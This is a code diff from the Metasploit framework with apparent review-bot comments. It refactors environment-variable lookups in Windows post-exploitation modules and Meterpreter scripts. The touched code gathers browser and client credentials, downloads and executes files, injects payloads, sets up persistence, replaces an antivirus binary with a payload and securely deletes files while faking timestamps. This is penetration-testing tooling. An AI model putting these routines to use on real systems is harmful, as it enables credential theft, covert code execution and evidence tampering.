b/modules/post/windows/gather/credentials/winscp.rb index cf08f7bba5..fc8d61fb18 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post def run print_status("Looking for WinSCP.ini file storage...") - get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini') + get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini")) print_status("Looking for Registry Storage...") get_reg() print_status("Done!") diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index a30e887857..547614c390 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb 
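Review bot: Both entries pushed by the new `progfiles_env.each` loop in vnc.rb carry `:name => 'UltraVNC'`, so on an x64 host where both ProgramFiles variables exist the two candidate ini files cannot be told apart in whatever the module reports later; `:name => "UltraVNC (#{k})"` keeps them distinct. `v.blank?` is ActiveSupport (available inside the framework) and covers both nil and empty string, which is the right guard since x86 hosts have no `ProgramFiles(x86)`. The key is requested as `ProgramFiles(x86)` here and as `ProgramFiles(X86)` elsewhere in this change; if the returned hash is keyed by the requested spelling, a shared constant would prevent lookups silently missing. The method building `locations` starts outside the hunk.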
@@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post user = session.sys.config.getuid userpath = nil useroffcpath = nil - sysdrv = session.fs.file.expand_path("%SystemDrive%") + env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME') + sysdrv = env_vars['SystemDrive'] if os =~ /Windows 7|Vista|2008/ userpath = sysdrv + "\\Users\\" lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" @@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post userinfo = {} end else - uservar = session.fs.file.expand_path("%USERNAME%") + uservar = env_vars['USERNAME'] userinfo['username'] = uservar userinfo['userpath'] = userpath + uservar + lnkpath userinfo['useroffcpath'] = userpath + uservar + officelnkpath diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index 06ee91d28f..ef990c7abc 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post host = session.session_host #Get Google Chrome user data path - sysdrive = expand_path("%SYSTEMDRIVE%").strip + env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME') + sysdrive = env_vars['SYSTEMDRIVE'].strip if directory?("#{sysdrive}\\Users") @profiles_path = "#{sysdrive}/Users" @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default" @@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post else uid = session.sys.config.getuid print_status "Running as user '#{uid}'..." - usernames << expand_path("%USERNAME%").strip + usernames << env_vars['USERNAME'].strip end has_sqlite3 = true diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 8160a19af3..ae291ca0e8 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb 
@@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post return results end - windir = session.fs.file.expand_path("%windir%") + windir = session.sys.config.getenv('windir') getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1) data = nil @@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post elsif exist?(val_location + "\\my.cnf") data = read_file(val_location + "\\my.cnf") else - sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%") + sysdriv=session.sys.config.getenv('SYSTEMDRIVE') getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1) getfile.each do |file| if exist?("#{file['path']}\\#{file['name']}") diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb index 60c6c3a20e..3079bc053a 100644 --- a/modules/post/windows/gather/enum_files.rb +++ b/modules/post/windows/gather/enum_files.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post def download_files(location, file_type) - sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%") + sysdriv = client.sys.config.getenv('SYSTEMDRIVE') sysnfo = client.sys.config.sysinfo['OS'] profile_path_old = sysdriv + "\\Documents and Settings\\" profile_path_new = sysdriv + "\\Users\\" diff --git a/modules/post/windows/gather/enum_ie.rb b/modules/post/windows/gather/enum_ie.rb index 09e06862e0..5711bcc5fd 100644 --- a/modules/post/windows/gather/enum_ie.rb +++ b/modules/post/windows/gather/enum_ie.rb @@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post xp_c = "\\Cookies\\index.dat" h_paths = [] c_paths = [] - base = session.fs.file.expand_path("%USERPROFILE%") + base = session.sys.config.getenv('USERPROFILE') if host['OS'] =~ /(Windows 7|2008|Vista)/ h_paths << base + vist_h h_paths << base + vist_hlow diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index 1107e15974..32a69e0faa 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb 
+++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post users = [] user = session.sys.config.getuid path4users = "" - sysdrv = session.fs.file.expand_path("%SystemDrive%") + env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME') + sysdrv = env_vars['SystemDrive'] if os =~ /Windows 7|Vista|2008/ path4users = sysdrv + "\\Users\\" @@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post end else userinfo = {} - uservar = session.fs.file.expand_path("%USERNAME%") + uservar = env_vars['USERNAME'] userinfo['username'] = uservar userinfo['userappdata'] = path4users + uservar + profilepath users << userinfo @@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post end if powershell_version =~ /2./ print_status("Powershell Modules:") - powershell_module_path = session.fs.file.expand_path("%PSModulePath%") + powershell_module_path = session.sys.config.getenv('PSModulePath') session.fs.dir.foreach(powershell_module_path) do |m| next if m =~ /^(\.|\.\.)$/ print_status("\t#{m}") diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index 81ca4376a6..c513be790e 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post print_prefetch_key_value print_timezone_key_values(key_value) print_good("Current UTC Time: %s" % Time.now.utc) - sys_root = expand_path("%SYSTEMROOT%") + sys_root = session.sys.config.getenv('SYSTEMROOT') full_path = sys_root + "\\Prefetch\\" file_type = "*.pf" print_status("Gathering information from remote system. This will take awhile..") diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 66a4f04aae..3f6fb95e9d 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb 
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post # Initialize all 7 possible paths for the answer file # def init_paths - drive = session.fs.file.expand_path("%SystemDrive%") + drive = session.sys.config.getenv('SystemDrive') files = [ diff --git a/modules/post/windows/manage/download_exec.rb b/modules/post/windows/manage/download_exec.rb index 6dd6668288..bb5cbbb115 100644 --- a/modules/post/windows/manage/download_exec.rb +++ b/modules/post/windows/manage/download_exec.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post register_advanced_options( [ OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]), - OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]), + OptInt.new( 'EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]), OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]), ], self.class) @@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post url = datastore["URL"] filename = datastore["FILENAME"] || url.split('/').last - download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"]) - if download_path.nil? or download_path.empty? - path = session.fs.file.expand_path("%TEMP%") + path = datastore['DOWNLOAD_PATH'] + if path.blank? + path = session.sys.config.getenv('TEMP') else - path = download_path + path = session.fs.file.expand_path(path) end outpath = path + '\\' + filename exec = datastore['EXECUTE'] - exec_string = datastore['EXEC_STRING'] || '' + exec_string = datastore['EXEC_STRING'] output = datastore['OUTPUT'] remove = datastore['DELETE'] @@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post # Execute file upon request if exec begin - cmd = "#{outpath} #{exec_string}" - - # If we don't have the following gsub, we get this error in Windows: - # "Operation failed: The system cannot find the file specified" - cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ') + cmd = "\"#{outpath}\" #{exec_string}" print_status("Executing file: #{cmd}") res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT']) 
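Review bot: In the last download_exec.rb hunk the quoted `cmd = "\"#{outpath}\" #{exec_string}"` replaces the backslash/space escaping whose rationale lived in the removed comment, but nothing now says why the path is quoted, so the next edit may drop it; add `# Quote outpath: DOWNLOAD_PATH may contain spaces (e.g. under Program Files) and cmd_exec hands the string straight to process creation`. Since `exec_string = datastore['EXEC_STRING']` no longer defaults to `''`, an unset option interpolates nil as an empty string and leaves a trailing space on the command line; harmless, but `datastore['EXEC_STRING'].to_s` makes the intent explicit. The method containing this spans beyond both hunks.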
diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index 8b3c9f2862..21bced57ef 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post end def create_pac(local_pac) - pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac" + pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac" conf_pac = "" if ::File.exists?(local_pac) diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 9e69f4cc8d..f32559170d 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post # Creates a temp notepad.exe to inject payload in to given the payload # Returns process PID def create_temp_proc(pay) - windir = client.fs.file.expand_path("%windir%") + windir = client.sys.config.getenv('windir') # Select path of executable to run depending the architecture if pay.arch.join == "x86" and client.platform =~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb index a810b16f41..df88e5b8b1 100644 --- a/modules/post/windows/manage/rpcapd_start.rb +++ b/modules/post/windows/manage/rpcapd_start.rb @@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post else print_status("Rpcap service found: #{serv['Name']}") reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start") - prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe" + # TODO: check if this works on x64 + prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe" if reg != 2 print_status("Setting rpcapd as 'auto' service") service_change_startup("rpcapd","auto") 
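Review bot: The `# TODO: check if this works on x64` added above `prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"` in rpcapd_start.rb leaves a known gap in the new line: if WinPcap is a 32-bit install, on x64 it lives under `ProgramFiles(x86)` and this path will not exist. The pattern used elsewhere in this change resolves it without the TODO: `pf = session.sys.config.getenvs('ProgramFiles(x86)', 'ProgramFiles')`, `x86 = pf['ProgramFiles(x86)']`, `prog = (x86.blank? ? pf['ProgramFiles'] : x86) << "\\winpcap\\rpcapd.exe"`. Whether a 64-bit rpcapd exists is not visible here, so keep the fallback to `ProgramFiles`. The enclosing `else` branch and method extend outside the hunk.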
diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index c5a9ca2e61..12ed81b5b1 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post end # set profile paths - sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%") + sysdrive = session.sys.config.getenv('SYSTEMDRIVE') os = @host_info['OS'] profiles_path = sysdrive + "\\Documents and Settings\\" profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/ diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb index d1df025153..c6f6d40fbb 100644 --- a/modules/post/windows/manage/sdel.rb +++ b/modules/post/windows/manage/sdel.rb @@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post #Function to calculate the size of the cluster def size_cluster() - drive = expand_path("%SystemDrive%") - r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4) + drive = session.sys.config.getenv('SystemDrive') + r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4) cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"] print_status("Cluster Size: #{cluster}") @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post #Function to calculate the real file size on disk (file size + slack space) def size_on_disk(file) - size_file = client.fs.file.stat(file).size; + size_file = session.fs.file.stat(file).size; print_status("Size of the file: #{size_file}") if (size_file<800) 
@@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post rsec= Rex::Text.rand_text_numeric(7,bad='012') date = Time.now - rsec.to_i print_status("Changing MACE attributes") - client.priv.fs.set_file_mace(file, date,date,date,date) + session.priv.fs.set_file_mace(file, date,date,date,date) end #Function to overwrite the file def file_overwrite(file,type,n) #FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk - r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0) + r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0) handle=r['return'] real_size=size_on_disk(file) @@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post end #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx - client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN") + session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN") #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx - w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil) + w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil) if w['return']==false print_error("The was an error writing to disk, check permissions") @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten") end - client.railgun.kernel32.CloseHandle(handle) + session.railgun.kernel32.CloseHandle(handle) change_mace(file) #Generate a long random file name before delete it @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post print_status("Changing file name") #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx - client.railgun.kernel32.MoveFileA(file,newname) + session.railgun.kernel32.MoveFileA(file,newname) file_rm(newname) print_good("File erased!") 
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post #Check if the file is encrypted or compressed def comp_encr(file) #http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx - handle=client.railgun.kernel32.GetFileAttributesA(file) + handle=session.railgun.kernel32.GetFileAttributesA(file) type= handle['return'] #FILE_ATTRIBUTE_COMPRESSED=0x800 diff --git a/scripts/meterpreter/dumplinks.rb b/scripts/meterpreter/dumplinks.rb index 444aa18439..0f77699f1b 100644 --- a/scripts/meterpreter/dumplinks.rb +++ b/scripts/meterpreter/dumplinks.rb @@ -61,7 +61,7 @@ def enum_users(os) user = @client.sys.config.getuid userpath = nil useroffcpath = nil - sysdrv = @client.fs.file.expand_path("%SystemDrive%") + sysdrv = @client.sys.config.getenv('SystemDrive') if os =~ /Windows 7|Vista|2008/ userpath = sysdrv + "\\Users\\" lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" @@ -83,7 +83,7 @@ def enum_users(os) users << userinfo end else - uservar = @client.fs.file.expand_path("%USERNAME%") + uservar = @client.sys.config.getenv('USERNAME') userinfo['username'] = uservar userinfo['userpath'] = userpath + uservar + lnkpath userinfo['useroffcpath'] = userpath + uservar + officelnkpath diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb index 9b072f511a..8771a3d139 100644 --- a/scripts/meterpreter/duplicate.rb +++ b/scripts/meterpreter/duplicate.rb @@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/ # # Upload to the filesystem # - tempdir = client.fs.file.expand_path("%TEMP%") + tempdir = client.sys.config.getenv('TEMP') tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" tempexe.gsub!("\\\\", "\\") diff --git a/scripts/meterpreter/enum_chrome.rb b/scripts/meterpreter/enum_chrome.rb index bbbb91ca72..e51067256a 100644 --- a/scripts/meterpreter/enum_chrome.rb +++ b/scripts/meterpreter/enum_chrome.rb 
@@ -195,7 +195,7 @@ host = session.session_host
 @log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
 ::FileUtils.mkdir_p(@log_dir)
-sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
+sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
 os = @host_info['OS']
 if os =~ /(Windows 7|2008|Vista)/
 @profiles_path = sysdrive + "\\Users\\"
@@ -218,7 +218,7 @@ if is_system?
 print_status "users found: #{usernames.join(", ")}"
 else
 print_status "running as user '#{uid}'..."
- usernames << client.fs.file.expand_path("%USERNAME%")
+ usernames << client.sys.config.getenv('USERNAME')
 prepare_railgun
 end
diff --git a/scripts/meterpreter/enum_firefox.rb b/scripts/meterpreter/enum_firefox.rb
index 704fa179c1..b6527aa0e9 100644
--- a/scripts/meterpreter/enum_firefox.rb
+++ b/scripts/meterpreter/enum_firefox.rb
@@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
 if frfxchk
 user = @client.sys.config.getuid
 if not is_system?
- usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
- db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
+ envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
+ usrname = envs['USERNAME']
+ db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
 if kill_frfx
 kill_firefox
 end
diff --git a/scripts/meterpreter/enum_powershell_env.rb b/scripts/meterpreter/enum_powershell_env.rb
index b814acd0f4..51a4c7eb33 100644
--- a/scripts/meterpreter/enum_powershell_env.rb
+++ b/scripts/meterpreter/enum_powershell_env.rb
@@ -22,7 +22,7 @@ def enum_users
 users = []
 user = @client.sys.config.getuid
 path4users = ""
- sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+ sysdrv = @client.sys.config.getenv('SystemDrive')
 if os =~ /Windows 7|Vista|2008/
 path4users = sysdrv + "\\Users\\"
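Review bot: In the enum_firefox.rb hunk, `usrname = envs['USERNAME']` drops the `Rex::FileUtils.clean_path` wrapper that the removed line applied, so a value read from the compromised host's environment is no longer sanitised before the script uses it. The later uses of `usrname` are outside this hunk; if it is still joined into a log or output path on the operator's side, as `clean_path` suggests it was, a username containing separators or `..` segments could now steer that path outside the intended directory. Keep the wrapper: `usrname = Rex::FileUtils.clean_path(envs['USERNAME'])`. The enclosing `if frfxchk` block continues outside the hunk.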
@@ -43,7 +43,7 @@ def enum_users
 end
 else
 userinfo = {}
- uservar = @client.fs.file.expand_path("%USERNAME%")
+ uservar = @client.sys.config.getenv('USERNAME')
 userinfo['username'] = uservar
 userinfo['userappdata'] = path4users + uservar + profilepath
 users << userinfo
@@ -83,7 +83,7 @@ def enum_powershell
 end
 if powershell_version =~ /2./
 print_status("Powershell Modules:")
- powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
+ powershell_module_path = @client.sys.config.getenv('PSModulePath')
 @client.fs.dir.foreach(powershell_module_path) do |m|
 next if m =~ /^(\.|\.\.)$/
 print_status("\t#{m}")
diff --git a/scripts/meterpreter/enum_vmware.rb b/scripts/meterpreter/enum_vmware.rb
index 27bd35adcc..78e611ab74 100644
--- a/scripts/meterpreter/enum_vmware.rb
+++ b/scripts/meterpreter/enum_vmware.rb
@@ -223,7 +223,7 @@ def enum_users
 users = []
 user = @client.sys.config.getuid
 path4users = ""
- sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+ sysdrv = @client.sys.config.getenv('SystemDrive')
 if os =~ /7|Vista|2008/
 path4users = sysdrv + "\\users\\"
@@ -244,7 +244,7 @@ def enum_users
 end
 else
 userinfo = {}
- uservar = @client.fs.file.expand_path("%USERNAME%")
+ uservar = @client.sys.config.getenv('USERNAME')
 userinfo['username'] = uservar
 userinfo['userappdata'] = path4users + uservar + profilepath
 users << userinfo
diff --git a/scripts/meterpreter/get_env.rb b/scripts/meterpreter/get_env.rb
index dde47e4782..00300fa26d 100644
--- a/scripts/meterpreter/get_env.rb
+++ b/scripts/meterpreter/get_env.rb
@@ -18,13 +18,12 @@ def list_env_vars(var_names)
 "Name", "Value"
 ])
- var_names.flatten.each do |v|
- tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
+ @client.sys.config.getenvs(*var_names.flatten).each do |k, v|
+ tbl << [k, v]
 end
 print("\n" + tbl.to_s + "\n")
 end
-
 opts.parse(args) { |opt, idx, val|
 case opt
 when "-h"
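Review bot: In the get_env.rb hunk, iterating the hash returned by `getenvs` instead of `var_names.flatten` changes what the table reports: a requested name that the target does not define gets no row at all, and row order follows the response rather than the user's argument order, so a missing variable is indistinguishable from a typo in the request. If one row per requested name is the intent, fetch once and look up: `envs = @client.sys.config.getenvs(*var_names.flatten)` followed by `var_names.flatten.each { |v| tbl << [v, envs[v]] }`. Whether `getenvs` omits unset names or returns them with an empty value is not visible here and should be confirmed against the stdapi implementation. list_env_vars starts outside the hunk.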
diff --git a/scripts/meterpreter/get_filezilla_creds.rb b/scripts/meterpreter/get_filezilla_creds.rb
index 55e6c2cd3d..1b719d8953 100644
--- a/scripts/meterpreter/get_filezilla_creds.rb
+++ b/scripts/meterpreter/get_filezilla_creds.rb
@@ -114,7 +114,7 @@ def enum_users(os)
 users = []
 path4users = ""
- sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+ sysdrv = @client.sys.config.getenv('SystemDrive')
 if os =~ /7|Vista|2008/
 path4users = sysdrv + "\\users\\"
@@ -135,7 +135,7 @@ def enum_users(os)
 end
 else
 userinfo = {}
- uservar = @client.fs.file.expand_path("%USERNAME%")
+ uservar = @client.sys.config.getenv('USERNAME')
 userinfo['username'] = uservar
 userinfo['userappdata'] = path4users + uservar + path2purple
 users << userinfo
diff --git a/scripts/meterpreter/get_pidgin_creds.rb b/scripts/meterpreter/get_pidgin_creds.rb
index 9edb6df611..9eda3dda41 100644
--- a/scripts/meterpreter/get_pidgin_creds.rb
+++ b/scripts/meterpreter/get_pidgin_creds.rb
@@ -145,7 +145,7 @@ def enum_users(os)
 users = []
 path4users = ""
- sysdrv = @client.fs.file.expand_path("%SystemDrive%")
+ sysdrv = @client.sys.config.getenv('SystemDrive')
 if os =~ /Windows 7|Vista|2008/
 path4users = sysdrv + "\\users\\"
@@ -166,7 +166,7 @@ def enum_users(os)
 end
 else
 userinfo = {}
- uservar = @client.fs.file.expand_path("%USERNAME%")
+ uservar = @client.sys.config.getenv('USERNAME')
 userinfo['username'] = uservar
 userinfo['userappdata'] = path4users + uservar + path2purple
 users << userinfo
diff --git a/scripts/meterpreter/getcountermeasure.rb b/scripts/meterpreter/getcountermeasure.rb
index 63c1b4f1c6..1a689c0008 100644
--- a/scripts/meterpreter/getcountermeasure.rb
+++ b/scripts/meterpreter/getcountermeasure.rb
@@ -301,7 +301,7 @@ def checkdep(session)
 tmpout = ""
 depmode = ""
 # Expand environment %TEMP% variable
- tmp = session.fs.file.expand_path("%TEMP%")
+ tmp = session.sys.config.getenv('TEMP')
 # Create random name for the wmic output
 wmicfile = sprintf("%.5d",rand(100000))
 wmicout = "#{tmp}\\#{wmicfile}"
diff --git a/scripts/meterpreter/hostsedit.rb b/scripts/meterpreter/hostsedit.rb
index 3a4eff2a73..838993d933 100644
--- a/scripts/meterpreter/hostsedit.rb
+++ b/scripts/meterpreter/hostsedit.rb
@@ -30,7 +30,7 @@ end
 record = ""
 #Set path to the hosts file
-hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
+hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
 #Function check if UAC is enabled
 def checkuac(session)
 winver = session.sys.config.sysinfo
diff --git a/scripts/meterpreter/panda_2007_pavsrv51.rb b/scripts/meterpreter/panda_2007_pavsrv51.rb
index 9ba0d699ed..8994c99784 100644
--- a/scripts/meterpreter/panda_2007_pavsrv51.rb
+++ b/scripts/meterpreter/panda_2007_pavsrv51.rb
@@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
 exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 # Change to our working directory.
- workingdir = client.fs.file.expand_path("%ProgramFiles%")
- client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
+ workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
+ client.fs.dir.chdir(workindir)
 # Create a backup of the original exe.
 print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
 client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
 # Place our newly created exe with the orginal binary name.
- tempdir = client.fs.file.expand_path("%ProgramFiles%")
- tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
+ tempexe = workingdir + "PAVSRV51.EXE"
 print_status("Sending EXE payload '#{tempexe}'.")
 fd = client.fs.file.new(tempexe, "wb")
diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb
index 4e9a8aa922..6e6418ca79 100644
--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
 if target_dir
 tempdir = target_dir
 else
- tempdir = @client.fs.file.expand_path("%TEMP%")
+ tempdir = @client.sys.config.getenv('TEMP')
 end
 tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
 fd = @client.fs.file.new(tempvbs, "wb")
diff --git a/scripts/meterpreter/pml_driver_config.rb b/scripts/meterpreter/pml_driver_config.rb
index 625c16aed1..8ae888a4cd 100644
--- a/scripts/meterpreter/pml_driver_config.rb
+++ b/scripts/meterpreter/pml_driver_config.rb
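Review bot: In the panda_2007_pavsrv51.rb hunk, `client.fs.dir.chdir(workindir)` references an undefined local — the variable assigned on the line above is `workingdir` — so this branch raises NameError before the rename and upload steps run. It should read `client.fs.dir.chdir(workingdir)`. The later `tempexe = workingdir + "PAVSRV51.EXE"` is consistent with the trailing backslash now carried in `workingdir`, so no further change is needed there. The enclosing `elsif` branch continues outside the hunk.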
@@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
 exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 # Place our newly created exe in %TEMP%
- tempdir = client.fs.file.expand_path("%TEMP%")
+ tempdir = client.sys.config.getenv('TEMP')
 tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
 print_status("Sending EXE payload '#{tempexe}'.")
 fd = client.fs.file.new(tempexe, "wb")
diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb
index 64eaaecec2..dce4598c09 100644
--- a/scripts/meterpreter/prefetchtool.rb
+++ b/scripts/meterpreter/prefetchtool.rb
@@ -19,7 +19,7 @@ require 'digest/sha1'
 "-l" => [ false, "Download Prefetch Folder Analysis Log"] )
-@tempdir = @session.fs.file.expand_path("%TEMP%")
+@tempdir = @session.sys.config.getenv('TEMP')
 #---------------------------------------------------------------------------------------------------------
 def read_program_list
diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb
index 390ee6b99a..d5f2703288 100644
--- a/scripts/meterpreter/remotewinenum.rb
+++ b/scripts/meterpreter/remotewinenum.rb
@@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
 runfail = 0
 runningas = session.sys.config.getuid
 begin
- tmp = session.fs.file.expand_path("%TEMP%")
+ tmp = session.sys.config.getenv('TEMP')
 # Temporary file on windows host to store results
 wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
diff --git a/scripts/meterpreter/scheduleme.rb b/scripts/meterpreter/scheduleme.rb
index adc89c5150..edf4287d9a 100644
--- a/scripts/meterpreter/scheduleme.rb
+++ b/scripts/meterpreter/scheduleme.rb
@@ -179,7 +179,7 @@ end
 #---------------------------------------------------------------------------------------------------------
 def upload(session,file)
- location = session.fs.file.expand_path("%TEMP%")
+ location = session.sys.config.getenv('TEMP')
 fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
 print_status("Uploading #{file}....")
 session.fs.file.upload_file("#{fileontrgt}","#{file}")
diff --git a/scripts/meterpreter/schelevator.rb b/scripts/meterpreter/schelevator.rb
index e74e08da35..78153842d5 100644
--- a/scripts/meterpreter/schelevator.rb
